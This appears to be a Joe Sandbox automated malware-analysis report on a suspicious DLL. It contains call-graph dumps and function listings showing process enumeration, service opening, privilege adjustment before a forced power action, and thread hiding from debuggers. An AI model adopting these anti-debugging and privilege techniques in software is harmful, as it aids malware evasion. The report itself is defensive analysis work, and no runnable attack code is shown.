6c2e6a43 std::_Facet_Register 4 API calls 100983->100985 100984->100986 100985->100986 100987 6c2e5960 104 API calls 100986->100987 100992 6c16c0db std::ios_base::_Ios_base_dtor _strlen 100987->100992 100988 6c16c7a5 100990 6c2e6a43 std::_Facet_Register 4 API calls 100988->100990 100989 6c16c7bc 100991 6c2e6a43 std::_Facet_Register 4 API calls 100989->100991 100999 6c16c753 _Yarn _strlen 100990->100999 100991->100999 100992->100861 100992->100988 100992->100989 100992->100999 100993 6c16d406 100996 6c2e6a43 std::_Facet_Register 4 API calls 100993->100996 100994 6c16d3ed 100995 6c2e6a43 std::_Facet_Register 4 API calls 100994->100995 100997 6c16d39a _Yarn 100995->100997 100996->100997 100998 6c2e5960 104 API calls 100997->100998 101000 6c16d458 std::ios_base::_Ios_base_dtor _strlen 100998->101000 100999->100871 100999->100993 100999->100994 100999->100997 101005 6c16cb2f 100999->101005 101000->100861 101001 6c16d8a4 101000->101001 101002 6c16d8bb 101000->101002 101006 6c16d852 _Yarn _strlen 101000->101006 101003 6c2e6a43 std::_Facet_Register 4 API calls 101001->101003 101004 6c2e6a43 std::_Facet_Register 4 API calls 101002->101004 101003->101006 101004->101006 101006->100871 101007 6c16dcb6 101006->101007 101008 6c16dccf 101006->101008 101011 6c16dc69 _Yarn 101006->101011 101009 6c2e6a43 std::_Facet_Register 4 API calls 101007->101009 101010 6c2e6a43 std::_Facet_Register 4 API calls 101008->101010 101009->101011 101010->101011 101012 6c2e5960 104 API calls 101011->101012 101014 6c16dd1c std::ios_base::_Ios_base_dtor 101012->101014 101013 6c2e4ff0 4 API calls 101013->100942 101014->100861 101014->101013 101017 6c2e5156 101015->101017 101016 6c2e51e8 OpenServiceA 101016->101017 101017->101016 101018 6c2e522f 101017->101018 101018->100909 101021 6c2d03a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 101019->101021 101020 6c2d3f5f CloseHandle 101020->101021 101021->101020 101022 6c2d310e CloseHandle 101021->101022 101023 6c2d251b CloseHandle 101021->101023 101024 6c1737cb 101021->101024 101025 6c2bc1e0 WriteFile WriteFile WriteFile ReadFile 101021->101025 101050 6c2bb730 101021->101050 101022->101021 101023->101021 101027 6c2e5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 101024->101027 101025->101021 101027->100878 101029 6c186e9f 101028->101029 101035 6c186eb3 101029->101035 101061 6c1b3560 32 API calls std::_Xinvalid_argument 101029->101061 101033 6c186f6e 101033->100921 101034 6c186f5b 101034->101033 101062 6c1b37e0 32 API calls std::_Xinvalid_argument 101034->101062 101035->101034 101063 6c1b2250 30 API calls 101035->101063 101064 6c1b26e0 24 API calls 4 library calls 101035->101064 101065 6c2e9379 RaiseException 101035->101065 101038->100903 101039->100925 101040->100954 101042 6c2e52a0 std::locale::_Setgloballocale 101041->101042 101043 6c2e5277 CloseHandle 101042->101043 101044 6c2e5320 Process32NextW 101042->101044 101045 6c2e53b1 101042->101045 101046 6c2e5345 Process32FirstW 101042->101046 101043->101042 101044->101042 101045->100883 101046->101042 101047->100901 101049->100884 101051 6c2bb743 _Yarn __wsopen_s std::locale::_Setgloballocale 101050->101051 101052 6c2bc180 101051->101052 101053 6c2bbced CreateFileA 101051->101053 101055 6c2baa30 101051->101055 101052->101021 101053->101051 101056 6c2baa43 __wsopen_s std::locale::_Setgloballocale 101055->101056 101057 6c2bb3e9 WriteFile 101056->101057 101058 6c2bb43d WriteFile 101056->101058 101059 6c2bb718 101056->101059 101060 6c2bab95 ReadFile 101056->101060 101057->101056 101058->101056 101059->101051 101060->101056 101061->101035 101062->101033 101063->101035 101064->101035 101065->101035 101066 6c2fcad3 101067 6c2fcafd 101066->101067 101068 6c2fcae5 __dosmaperr 101066->101068 101067->101068 101069 6c2fcb77 101067->101069 101071 6c2fcb48 __dosmaperr 101067->101071 101072 6c2fcb90 101069->101072 101074 6c2fcbe7 __wsopen_s 101069->101074 101075 6c2fcbab __dosmaperr 101069->101075 101108 6c2f0120 18 API calls __cftoe 101071->101108 101073 6c2fcb95 101072->101073 101072->101075 101076 6c3019e5 __wsopen_s 18 API calls 101073->101076 101102 6c2f47bb HeapFree GetLastError __dosmaperr 101074->101102 101101 6c2f0120 18 API calls __cftoe 101075->101101 101078 6c2fcd3e 101076->101078 101081 6c2fcdb4 101078->101081 101084 6c2fcd57 GetConsoleMode 101078->101084 101079 6c2fcc07 101103 6c2f47bb HeapFree GetLastError __dosmaperr 101079->101103 101083 6c2fcdb8 ReadFile 101081->101083 101086 6c2fce2c GetLastError 101083->101086 101087 6c2fcdd2 101083->101087 101084->101081 101088 6c2fcd68 101084->101088 101085 6c2fcc0e 101098 6c2fcbc2 __dosmaperr __wsopen_s 101085->101098 101104 6c2fac69 20 API calls __wsopen_s 101085->101104 101086->101098 101087->101086 101089 6c2fcda9 101087->101089 101088->101083 101090 6c2fcd6e ReadConsoleW 101088->101090 101094 6c2fce0e 101089->101094 101095 6c2fcdf7 101089->101095 101089->101098 101090->101089 101091 6c2fcd8a GetLastError 101090->101091 101091->101098 101097 6c2fce25 101094->101097 101094->101098 101106 6c2fcefe 23 API calls 3 library calls 101095->101106 101107 6c2fd1b6 21 API calls __wsopen_s 101097->101107 101105 6c2f47bb HeapFree GetLastError __dosmaperr 101098->101105 101100 6c2fce2a 101100->101098 101101->101098 101102->101079 101103->101085 101104->101073 101105->101068 101106->101098 101107->101100 101108->101068

                              Executed Functions

                              Function 6C164754 Relevance: 69.2, APIs: 28, Strings: 1, Instructions: 18471COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _strlen
                              • String ID: HR^
                              • API String ID: 4218353326-1341859651
                              • Opcode ID: 173d1621d3a529ee3fd72907d50436c77e9c2824876f4f7862986c09601f00e4
                              • Instruction ID: 276c7904c53dd7d1f94ee149c9728156fd2e2fc461037ed114a27a68336d1027
                              • Opcode Fuzzy Hash: 173d1621d3a529ee3fd72907d50436c77e9c2824876f4f7862986c09601f00e4
                              • Instruction Fuzzy Hash: B2742531644B018FC728CF29C8D0695B7F3EF95318B298A6DC0A68BF55E778B54ACB50
                              Function 6C174A27 Relevance: 61.3, APIs: 25, Strings: 3, Instructions: 12265COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: }jk$;T55$L@^
                              • API String ID: 0-4218709813
                              • Opcode ID: 9ee955a3ca4bef18ded641fb3a1fede5f89b200df50af5aa4219005830661620
                              • Instruction ID: 8407d2c76bda53a126ef799e007166fb094e208b94e3291ebf83de22b7031fa5
                              • Opcode Fuzzy Hash: 9ee955a3ca4bef18ded641fb3a1fede5f89b200df50af5aa4219005830661620
                              • Instruction Fuzzy Hash: D13429716447018FC738CF28C8D0A95B7F3EF95318B198A6DC0968BB55EB78B54ACB60
                              Function 6C2E5240 Relevance: 6.1, APIs: 4, Instructions: 95processCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7677 6c2e5240-6c2e5275 CreateToolhelp32Snapshot 7678 6c2e52a0-6c2e52a9 7677->7678 7679 6c2e52ab-6c2e52b0 7678->7679 7680 6c2e52e0-6c2e52e5 7678->7680 7681 6c2e5315-6c2e531a 7679->7681 7682 6c2e52b2-6c2e52b7 7679->7682 7683 6c2e52eb-6c2e52f0 7680->7683 7684 6c2e5377-6c2e53a1 call 6c2f2c05 7680->7684 7687 6c2e53a6-6c2e53ab 7681->7687 7688 6c2e5320-6c2e5332 Process32NextW 7681->7688 7690 6c2e52b9-6c2e52be 7682->7690 7691 6c2e5334-6c2e535d call 6c2eb920 Process32FirstW 7682->7691 7685 6c2e5277-6c2e5292 CloseHandle 7683->7685 7686 6c2e52f2-6c2e52f7 7683->7686 7684->7678 7685->7678 7686->7678 7692 6c2e52f9-6c2e5313 7686->7692 7687->7678 7697 6c2e53b1-6c2e53bf 7687->7697 7694 6c2e5362-6c2e5372 7688->7694 7690->7678 7696 6c2e52c0-6c2e52d1 7690->7696 7691->7694 7692->7678 7694->7678 7696->7678
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C2E524E
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CreateSnapshotToolhelp32
                              • String ID:
                              • API String ID: 3332741929-0
                              • Opcode ID: ac27f304e8d3a19babdfdb584e630affaf8ea685832ca8f15bb888328dc2bd5d
                              • Instruction ID: d33c0d63d368c23ed82aaf45b713a7331043345a0c9d07bb537887317f7dd62c
                              • Opcode Fuzzy Hash: ac27f304e8d3a19babdfdb584e630affaf8ea685832ca8f15bb888328dc2bd5d
                              • Instruction Fuzzy Hash: 2A314F746183059FDB109F68C888B0ABBF4AF99745F90493EF898EB361D37198488F52
                              Function 6C163886 Relevance: 3.6, APIs: 2, Instructions: 573COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7821 6c163886-6c16388e 7822 6c163894-6c163896 7821->7822 7823 6c163970-6c16397d 7821->7823 7822->7823 7826 6c16389c-6c1638b9 7822->7826 7824 6c1639f1-6c1639f8 7823->7824 7825 6c16397f-6c163989 7823->7825 7828 6c163ab5-6c163aba 7824->7828 7829 6c1639fe-6c163a03 7824->7829 7825->7826 7827 6c16398f-6c163994 7825->7827 7830 6c1638c0-6c1638c1 7826->7830 7831 6c163b16-6c163b18 7827->7831 7832 6c16399a-6c16399f 7827->7832 7828->7826 7836 6c163ac0-6c163ac7 7828->7836 7833 6c1638d2-6c1638d4 7829->7833 7834 6c163a09-6c163a2f 7829->7834 7835 6c16395e 7830->7835 7831->7830 7837 6c1639a5-6c1639bf 7832->7837 7838 6c16383b-6c163855 call 6c2b1470 call 6c2b1480 7832->7838 7841 6c163957-6c16395c 7833->7841 7839 6c163a35-6c163a3a 7834->7839 7840 6c1638f8-6c163955 7834->7840 7842 6c163960-6c163964 7835->7842 7836->7830 7843 6c163acd-6c163ad6 7836->7843 7845 6c163a5a-6c163a5d 7837->7845 7849 6c163860-6c163885 7838->7849 7846 6c163a40-6c163a57 7839->7846 7847 6c163b1d-6c163b22 7839->7847 7840->7841 7841->7835 7842->7849 7850 6c16396a 7842->7850 7843->7831 7844 6c163ad8-6c163aeb 7843->7844 7844->7840 7852 6c163af1-6c163af8 7844->7852 7856 6c163aa9-6c163ab0 7845->7856 7846->7845 7854 6c163b24-6c163b44 7847->7854 7855 6c163b49-6c163b50 7847->7855 7849->7821 7851 6c163ba1-6c163bb6 7850->7851 7864 6c163bc0-6c163bda call 6c2b1470 call 6c2b1480 7851->7864 7859 6c163b62-6c163b85 7852->7859 7860 6c163afa-6c163aff 7852->7860 7854->7856 7855->7830 7863 6c163b56-6c163b5d 7855->7863 7856->7842 7859->7840 7867 6c163b8b 7859->7867 7860->7841 7863->7842 7872 6c163be0-6c163bfe 7864->7872 7867->7851 7875 6c163c04-6c163c11 7872->7875 7876 6c163e7b 7872->7876 7877 6c163c17-6c163c20 7875->7877 7878 6c163ce0-6c163cea 7875->7878 7879 6c163e81-6c163ee0 call 6c163750 GetCurrentThread NtSetInformationThread 7876->7879 7880 6c163c26-6c163c2d 7877->7880 7881 6c163dc5 7877->7881 7882 6c163cec-6c163d0c 7878->7882 7883 6c163d3a-6c163d3c 7878->7883 7892 6c163eea-6c163f04 call 6c2b1470 call 6c2b1480 7879->7892 7886 6c163dc3 7880->7886 7887 6c163c33-6c163c3a 7880->7887 7888 6c163dc6 7881->7888 7889 6c163d90-6c163d95 7882->7889 7890 6c163d70-6c163d8d 7883->7890 7891 6c163d3e-6c163d45 7883->7891 7886->7881 7895 6c163e26-6c163e2b 7887->7895 7896 6c163c40-6c163c5b 7887->7896 7897 6c163dc8-6c163dcc 7888->7897 7893 6c163d97-6c163db8 7889->7893 7894 6c163dba-6c163dc1 7889->7894 7890->7889 7898 6c163d50-6c163d57 7891->7898 7915 6c163f75-6c163fa1 7892->7915 7893->7881 7894->7886 7900 6c163dd7-6c163ddc 7894->7900 7901 6c163e31 7895->7901 7902 6c163c7b-6c163cd0 7895->7902 7903 6c163e1b-6c163e24 7896->7903 7897->7872 7904 6c163dd2 7897->7904 7898->7888 7906 6c163e36-6c163e3d 7900->7906 7907 6c163dde-6c163e17 7900->7907 7901->7864 7902->7898 7903->7897 7908 6c163e76-6c163e79 7903->7908 7904->7908 7911 6c163e3f-6c163e5a 7906->7911 7912 6c163e5c-6c163e5f 7906->7912 7907->7903 7908->7879 7911->7903 7912->7902 7914 6c163e65-6c163e69 7912->7914 7914->7897 7914->7908 7919 6c163fa3-6c163fa8 7915->7919 7920 6c164020-6c164026 7915->7920 7923 6c163fae-6c163fcf 7919->7923 7924 6c16407c-6c164081 7919->7924 7921 6c163f06-6c163f35 7920->7921 7922 6c16402c-6c16403c 7920->7922 7925 6c163f38-6c163f61 7921->7925 7926 6c1640b3-6c1640b8 7922->7926 7927 6c16403e-6c164058 7922->7927 7929 6c1640aa-6c1640ae 7923->7929 7928 6c164083-6c16408a 7924->7928 7924->7929 7930 6c163f64-6c163f67 7925->7930 7926->7923 7933 6c1640be-6c1640c9 7926->7933 7931 6c16405a-6c164063 7927->7931 7928->7925 7932 6c164090 7928->7932 7934 6c163f6b-6c163f6f 7929->7934 7935 6c163f69 7930->7935 7936 6c1640f5-6c16413f 7931->7936 7937 6c164069-6c16406c 7931->7937 7932->7892 7938 6c1640a7 7932->7938 7933->7929 7939 6c1640cb-6c1640d4 7933->7939 7934->7915 7935->7934 7936->7935 7941 6c164144-6c16414b 7937->7941 7942 6c164072-6c164077 7937->7942 7938->7929 7939->7938 7943 6c1640d6-6c1640f0 7939->7943 7941->7934 7942->7930 7943->7931
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1f46f5a4823f4ee6f4bde57568a6acae08e61e6a565a2a422c0a8735088ded2e
                              • Instruction ID: 8fc52c1b4464eb4926c0550d92a0eedee013df940c5a5e032893c9e9251f8114
                              • Opcode Fuzzy Hash: 1f46f5a4823f4ee6f4bde57568a6acae08e61e6a565a2a422c0a8735088ded2e
                              • Instruction Fuzzy Hash: F232F232245B018FC324CF29C890695B7E3EF91314BAA8A6CC0EA4BF95D775B45BCB50
                              Function 6C163A6A Relevance: 3.1, APIs: 2, Instructions: 148threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7969 6c163a6a-6c163a85 7970 6c163a87-6c163aa7 7969->7970 7971 6c163aa9-6c163ab0 7970->7971 7972 6c163960-6c163964 7971->7972 7973 6c163860-6c16388e 7972->7973 7974 6c16396a 7972->7974 7983 6c163894-6c163896 7973->7983 7984 6c163970-6c16397d 7973->7984 7975 6c163ba1-6c163bb6 7974->7975 7978 6c163bc0-6c163bda call 6c2b1470 call 6c2b1480 7975->7978 7990 6c163be0-6c163bfe 7978->7990 7983->7984 7989 6c16389c-6c1638b9 7983->7989 7987 6c1639f1-6c1639f8 7984->7987 7988 6c16397f-6c163989 7984->7988 7992 6c163ab5-6c163aba 7987->7992 7993 6c1639fe-6c163a03 7987->7993 7988->7989 7991 6c16398f-6c163994 7988->7991 7994 6c1638c0-6c1638c1 7989->7994 8010 6c163c04-6c163c11 7990->8010 8011 6c163e7b 7990->8011 7996 6c163b16-6c163b18 7991->7996 7997 6c16399a-6c16399f 7991->7997 7992->7989 8001 6c163ac0-6c163ac7 7992->8001 7998 6c1638d2-6c1638d4 7993->7998 7999 6c163a09-6c163a2f 7993->7999 8000 6c16395e 7994->8000 7996->7994 8003 6c1639a5-6c1639bf 7997->8003 8004 6c16383b-6c163855 call 6c2b1470 call 6c2b1480 7997->8004 8007 6c163957-6c16395c 7998->8007 8005 6c163a35-6c163a3a 7999->8005 8006 6c1638f8-6c163955 7999->8006 8000->7972 8001->7994 8008 6c163acd-6c163ad6 8001->8008 8012 6c163a5a-6c163a5d 8003->8012 8004->7973 8013 6c163a40-6c163a57 8005->8013 8014 6c163b1d-6c163b22 8005->8014 8006->8007 8007->8000 8008->7996 8009 6c163ad8-6c163aeb 8008->8009 8009->8006 8016 6c163af1-6c163af8 8009->8016 8017 6c163c17-6c163c20 8010->8017 8018 6c163ce0-6c163cea 8010->8018 8021 6c163e81-6c163ee0 call 6c163750 GetCurrentThread NtSetInformationThread 8011->8021 8012->7971 8013->8012 8019 6c163b24-6c163b44 8014->8019 8020 6c163b49-6c163b50 8014->8020 8024 6c163b62-6c163b85 8016->8024 8025 6c163afa-6c163aff 8016->8025 8026 6c163c26-6c163c2d 8017->8026 8027 6c163dc5 8017->8027 8029 6c163cec-6c163d0c 8018->8029 8030 6c163d3a-6c163d3c 8018->8030 8019->7970 8020->7994 8028 6c163b56-6c163b5d 8020->8028 8041 6c163eea-6c163f04 call 6c2b1470 call 6c2b1480 8021->8041 8024->8006 8036 6c163b8b 8024->8036 8025->8007 8034 6c163dc3 8026->8034 8035 6c163c33-6c163c3a 8026->8035 8037 6c163dc6 8027->8037 8028->7972 8038 6c163d90-6c163d95 8029->8038 8039 6c163d70-6c163d8d 8030->8039 8040 6c163d3e-6c163d45 8030->8040 8034->8027 8044 6c163e26-6c163e2b 8035->8044 8045 6c163c40-6c163c5b 8035->8045 8036->7975 8046 6c163dc8-6c163dcc 8037->8046 8042 6c163d97-6c163db8 8038->8042 8043 6c163dba-6c163dc1 8038->8043 8039->8038 8047 6c163d50-6c163d57 8040->8047 8064 6c163f75-6c163fa1 8041->8064 8042->8027 8043->8034 8049 6c163dd7-6c163ddc 8043->8049 8050 6c163e31 8044->8050 8051 6c163c7b-6c163cd0 8044->8051 8052 6c163e1b-6c163e24 8045->8052 8046->7990 8053 6c163dd2 8046->8053 8047->8037 8055 6c163e36-6c163e3d 8049->8055 8056 6c163dde-6c163e17 8049->8056 8050->7978 8051->8047 8052->8046 8057 6c163e76-6c163e79 8052->8057 8053->8057 8060 6c163e3f-6c163e5a 8055->8060 8061 6c163e5c-6c163e5f 8055->8061 8056->8052 8057->8021 8060->8052 8061->8051 8063 6c163e65-6c163e69 8061->8063 8063->8046 8063->8057 8068 6c163fa3-6c163fa8 8064->8068 8069 6c164020-6c164026 8064->8069 8072 6c163fae-6c163fcf 8068->8072 8073 6c16407c-6c164081 8068->8073 8070 6c163f06-6c163f35 8069->8070 8071 6c16402c-6c16403c 8069->8071 8074 6c163f38-6c163f61 8070->8074 8075 6c1640b3-6c1640b8 8071->8075 8076 6c16403e-6c164058 8071->8076 8078 6c1640aa-6c1640ae 8072->8078 8077 6c164083-6c16408a 8073->8077 8073->8078 8079 6c163f64-6c163f67 8074->8079 8075->8072 8082 6c1640be-6c1640c9 8075->8082 8080 6c16405a-6c164063 8076->8080 8077->8074 8081 6c164090 8077->8081 8083 6c163f6b-6c163f6f 8078->8083 8084 6c163f69 8079->8084 8085 6c1640f5-6c16413f 8080->8085 8086 6c164069-6c16406c 8080->8086 8081->8041 8087 6c1640a7 8081->8087 8082->8078 8088 6c1640cb-6c1640d4 8082->8088 8083->8064 8084->8083 8085->8084 8090 6c164144-6c16414b 8086->8090 8091 6c164072-6c164077 8086->8091 8087->8078 8088->8087 8092 6c1640d6-6c1640f0 8088->8092 8090->8083 8091->8079 8092->8080
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 36c76e76e26ad5c867f5fcc259058b965bf7d0daa7fd903ee0c54d717b8365fc
                              • Instruction ID: 14cae92dcc8125e8c136fea94178c5817597de77339a26372d04d590570bd898
                              • Opcode Fuzzy Hash: 36c76e76e26ad5c867f5fcc259058b965bf7d0daa7fd903ee0c54d717b8365fc
                              • Instruction Fuzzy Hash: CB51F031104B018FC320CF2AC8907D5B7A3BF96314FAA8A5DC0E61BE95DB74B45ACB51
                              Function 6C1639CF Relevance: 3.1, APIs: 2, Instructions: 139threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 29f4ce15906b56d97adfa05cccf5abb06132bf78e0b55c7f4f150b563a207d28
                              • Instruction ID: b4b68e580aa89648624cb8dca2ffac800e93349c7e2f693df628db23f50fab2a
                              • Opcode Fuzzy Hash: 29f4ce15906b56d97adfa05cccf5abb06132bf78e0b55c7f4f150b563a207d28
                              • Instruction Fuzzy Hash: 9E51D131104B118BC320CF2AC490795B7B3BF96314FAA8A5DC0E65BE95DB74B45B8B91
                              Function 6C163D18 Relevance: 3.1, APIs: 2, Instructions: 89threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C163E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C163EAA
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 24e25ae13e379f62bba38f4b63d2662c8131f67b23cacd1ce5a6f16412993943
                              • Instruction ID: 40069da50a7b2c0eaf7bcf5180326de8cb94f72ae656dca8357bb8c7698d09f5
                              • Opcode Fuzzy Hash: 24e25ae13e379f62bba38f4b63d2662c8131f67b23cacd1ce5a6f16412993943
                              • Instruction Fuzzy Hash: CB310331105B018BC320CF25C8947C6B7B3AF96314F5A8A5DC0A65BE81DB78701A9B51
                              Function 6C163D62 Relevance: 3.1, APIs: 2, Instructions: 83threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C163E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C163EAA
                              Memory Dump Source
                              • Source File: 00000008.00000002.2380551200.000000006C161000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C160000, based on PE: true
                              • Associated: 00000008.00000002.2380527380.000000006C160000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381895296.000000006C308000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2381958531.000000006C318000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382542430.000000006C3E3000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2382572985.000000006C3E9000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.2383232195.000000006C4D3000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_6c160000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 5bd8740bf07f758a2b845615985871d7f6f1b421c412f2dcd05327660d0867c6
                              • Instruction ID: 049f25b3397fe5d34f26c7ea9c64d8f2752cfb8f327e7fd3a2ee23ca1f4f136e
                              • Opcode Fuzzy Hash: 5bd8740bf07f758a2b845615985871d7f6f1b421c412f2dcd05327660d0867c6
                              • Instruction Fuzzy Hash: B03123311047018BC324CF29C4A0796B7B7AF56308FAA4E5DC0E65BE81DB75B456CB92
                              Function 6C163C62 Relevance: 3.1, APIs: 2, Instructions: 72threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C163E9D
